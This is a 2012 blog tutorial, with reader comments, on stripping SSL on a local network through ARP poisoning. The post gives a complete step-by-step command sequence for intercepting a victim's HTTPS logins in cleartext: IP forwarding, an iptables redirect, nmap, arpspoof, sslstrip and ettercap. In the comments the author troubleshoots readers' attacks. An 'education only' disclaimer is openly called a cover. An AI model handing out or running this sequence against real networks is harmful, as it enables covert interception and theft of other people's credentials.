Monday 9 April 2012

Hacking SSL in LAN using ARP-Poisoning


Hello everyone, this time I am going to explain how to bypass SSL security using ARP poisoning and sslstrip.
I am going to use BackTrack 5 and ettercap for this tutorial.

I am going to explain this attack step by step.

I have uploaded the images in high resolution; if you can't see an image, click on it and zoom in.

This type of attack is done against a specific victim and has a drawback, but it still has more than an 80% success rate. When you type gmail.com, your request is sent to port 80, from where the gmail server redirects it to port 443. In this attack we come in the middle, accept all requests on port 80 ourselves and then forward them on to port 443.

In this attack we are going to do a MAN IN THE MIDDLE ATTACK.
This attack is also known as an ARP POISONING ATTACK.
To do this attack follow the steps below.........
Note:- BackTrack is case sensitive, so use the correct case.

Before starting the attack, make sure networking is running on your system. To do that use
service networking start
Step 1:- Flip your machine into forwarding mode.
echo 1 > /proc/sys/net/ipv4/ip_forward


Once your machine is in forwarding mode it will be able to accept the victim's packets and forward them on to their real destination.

step 2:- Set up an iptables rule to intercept HTTP requests:-
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000


In this step we are configuring our machine to accept requests arriving for port 80 and redirect them to local port 1000 (where sslstrip will listen in step 6).

step 3:- Check your network or subnet using the ifconfig command


In this example my network is 192.168.56.0/24.
If you are using Windows for this attack, use the ipconfig command to check your network.

step 4:- Find out the IP of the target PC and the router using nmap.
              nmap -sP 192.168.56.0/24


nmap is a scanner utility; you can use any other if you want, I prefer nmap......
Generally xx.xx.xx.1 is your router's IP address.

step 5:- Run arpspoof to convince the network it should send its traffic to your machine:
 arpspoof -i eth0 -t <target's IP> <router's IP>


Now your attack has started; don't stop it or close this terminal.

step 6:- start sslstrip from “backtrack -> Exploitation Tools -> web Exploitation -> sslstrip”


A new terminal will start; don't close the previous one....
Give the following command in the new terminal.
python sslstrip.py -l 1000


This tells sslstrip to listen on port 1000, where the iptables rule from step 2 sends the victim's HTTP traffic; sslstrip then opens the connection to the real server on port 443 (the SSL port) on the victim's behalf.
Don't close this terminal; start another terminal and follow the remaining steps.
Now the attack is in place.


step 7:- Start any sniffer and capture all the data.
I prefer ettercap, so I will start ettercap:
ettercap -Tq -i eth0
where eth0 is my interface name; you can see it using ifconfig.


Now sit and watch all the activity the victim is doing.

How does it work?
When the user types www.facebook.com,
the request is sent to the attacker on port 80. The attacker forwards it to facebook.com on port 443, receives the reply from facebook and creates the SSL tunnel with facebook, but the point to note is that it is the attacker who is creating the SSL tunnel with facebook, not the victim.

In simple words, for the victim the attacker is www.facebook.com, and for facebook.com the attacker is the user who is logging in.

On the victim's PC:


When the victim presses enter or clicks on login, all the data is sent to the attacker in clear text form...

Sorry for that, but I can't show my password and username; everything will be in clear text.
Most importantly, the victim has no idea that he has been hacked, because on the victim's PC everything appears to be working normally.




I have tried to make it as simple as I can, but if you still have any problem or any type of doubt you can ask????

I have also uploaded a video for reference:
This is for education purposes only.....Don't use it for bad purposes. Sorry for that, but you know I have to cover my ass....LOL

12 comments:

kakada93 said...

Hello, really nice post, I just have a couple of questions. If you can give me an e-mail so we can chat a bit :)

Aakar Periwal said...

periwalaakar26@gmail.com................

luni415 said...

sslstrip does not work anymore, right? I read that https sites found a way to secure port 443 from being forwarded to 8080 or 80

Aakar Periwal said...

Who says it doesn't work any more? It works fine if you ask me.....
Well, it works if the victim enters http:// instead of https://
If you type www.website.com then it will send you to port 80 by default, so it will work unless you enter https:// manually.....

Anonymous said...

Can you explain why this error has occurred in ettercap?


SEND L3 ERROR: 1112 byte packet (0800:06) destined to 69.171.246.16 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Network is unreachable)
)
SEND L3 ERROR: 52 byte packet (0800:06) destined to 69.171.246.16 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Network is unreachable)
)
SEND L3 ERROR: 1112 byte packet (0800:06) destined to 69.171.246.16 was not forwarded (libnet_write_raw_ipv4

Aakar Periwal said...

Hey zeeshaan zakariya, can you specify at which step you are getting this error.
I am not sure, but it seems you are using a public IP address for ARP poisoning; well, it may not work properly over a WAN, because once your request reaches the router your attack stops there, as a router can only forward IP-based requests, not MAC-based requests.

Unknown said...

hey buddy,, I've followed the steps in your video, but it seems it did not work for me,, ahmm, I have some questions buddy. Please help me with this, thank you,, at the last step when I sniff,, no password pops up, instead, it always says

DHCP: [18:A9:05:E2:54:F3] DISCOVER
DHCP: [192.168.1.253] OFFER : 192.168.1.102 255.255.255.0 GW 192.168.1.253 DNS 203.115. blah blah
DHCP: [18:A9:05:E2:54:F3] DISCOVER

Aakar Periwal said...

It looks like you have a DHCP server enabled in your network. The DHCP server is trying to allocate you an IP address. You should have a static IP address, because a static IP address makes it easier to attack.
Your output won't affect your attack. Whenever the victim tries to open any website, it will be redirected to your PC and you will get all the credentials.

Unknown said...

Thank you for the quick response buddy,, :D I know a little bit about how DHCP works,,
It seems that my router supports a DHCP server and it was enabled,, ahm, so do I have to disable the DHCP server in my router?? :) By the way, I'm the one who is responsible for the network infrastructure in our company,, I'm the network admin, so I can disable it if I want .. hehehe :) Thank you again for the quick response.

Aakar Periwal said...

As I have already mentioned, the DHCP server won't affect your attack.
This type of attack is launched against a single victim, so whoever is your victim must open a website which works on https; whenever he/she enters the name of the site, by default it goes to http and then gets converted into https (sometimes cookies or cache stored in the PC send it directly to https, in which case your attack won't work).

Unknown said...

You mean, buddy, that I have to be static?? hehe, sorry for being a noob

Unknown said...

Boss,, I'm now on a static IP address and my victim, which is my partner, is also on a static IP address.. but DHCP is still enabled.. see the attached pic, this is my result when I start sniffing. Thanks